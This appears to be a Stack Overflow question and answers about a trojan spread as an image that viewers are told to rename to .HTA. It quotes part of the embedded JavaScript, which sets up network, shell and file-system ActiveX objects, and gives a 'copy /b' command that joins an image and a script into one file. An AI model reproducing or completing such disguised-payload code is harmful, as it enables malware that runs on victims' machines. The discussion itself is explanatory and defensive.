# Embedding Javascript Within an Image File

Tags: javascript, hta, trojan

I've noticed a new trend in distributing potentially unsafe code where people will post an image to a server with a watermark suggesting that they change the filename to have a .HTA file extension.

I realized that .HTA was an HTML Application file, which are implicitly trusted by Microsoft's logic and can contain code to do just about anything web-based.  I opened the file with my favourite text editor and to my amazement there was Javascript code within the image file!

```
jfHe299x4qBICCBRgpbl81xTjwucn9j4s1UVZxe8kwoJcdWnXuVHqpilRRhptKRACMBr5koY8vt6AEttD5xeGTOPCfBoQVjCvblkiGcc4ddlfiZiBPdCVAlelSbvhv9XWcoMIYyGMCbMaGv9YUyFrHZg3ZVx6HnRCgz4CyaA2bU9qn6R3NkmHx0W3uG7SZcHYyPiMN6AnWDGXRztMnxL3sY1s3h9VH1oTL34iYawlaEUDOUscX19pPz89v0rfmlqKTXce16vSZ6JDsy4IC5SktfXdt3m50z2R5BbwuhP5BHJITxvD4dHzL6K4uh9tIc4gYCFnDV

//<script id=thisscript>
var dom1 = ["zip","img","zip","orz","orz","zip","cgi"];
var dom2 = ["bin","dat","bin","tmp","tmp","bin"];
// Global XMLHttp, shell, and file system objects
var request = new ActiveXObject("Msxml2.XMLHTTP");
var shell = new ActiveXObject("WScript.Shell");
var fs = new ActiveXObject("Scripting.FileSystemObject");
```

There is more garbled image data below the source code as well.  This is just a snippet.

I'm very curious to know how they were able to add Javascript code to an image file without corrupting the image file format and making it unviewable.  I presented this to some of my co-workers, and they were equally stumped.

Comment: Can you show a full file example?

Comment: I'm intrigued to see a full example too

Answer (score 1, accepted):

My guess is that this is a multipart file of some sort (for which it would be perfectly fine to contain both images and script data), that maybe gets executed straight away (in a local context) because it's treated as a Hypertext Application.

For more info, we would need to see the full actual file.

Comment: I found a version of the virus that self-replicates.  It uses a program called ImageMagick to join a random image from the user's Windows profile with its own code, then posts the image to a server.

Answer (score 1):

The problem here is liberal file format tolerances.

The JPG interpreter is forgiving enough to ignore "corrupted" non-image data. That's how you can view a large JPG while it's still downloading. The HTA interpreter is forgiving enough to ignore all the weird "text" at the top of the file and proceed to evaluate the stuff that looks like markup and script below.

There's another post about this curious behavior here: 
[Can I embed an icon to a .hta file?](https://stackoverflow.com/questions/175994/can-i-embed-an-icon-to-a-hta-file)
In it [Alexandre Jasmine](https://stackoverflow.com/users/162407/alexandre-jasmin) suggests embedding an icon in an HTA with this command line:

```
      copy /b icon.ico+source.hta iconapp.hta
```

The image/script you found could have been created using this technique.

You didn't include the entire script, but what you show looks pretty scary. An HTA script with a web connection, shell and filesystem object can do whatever it wants with your local filesystem then phone home once it's done.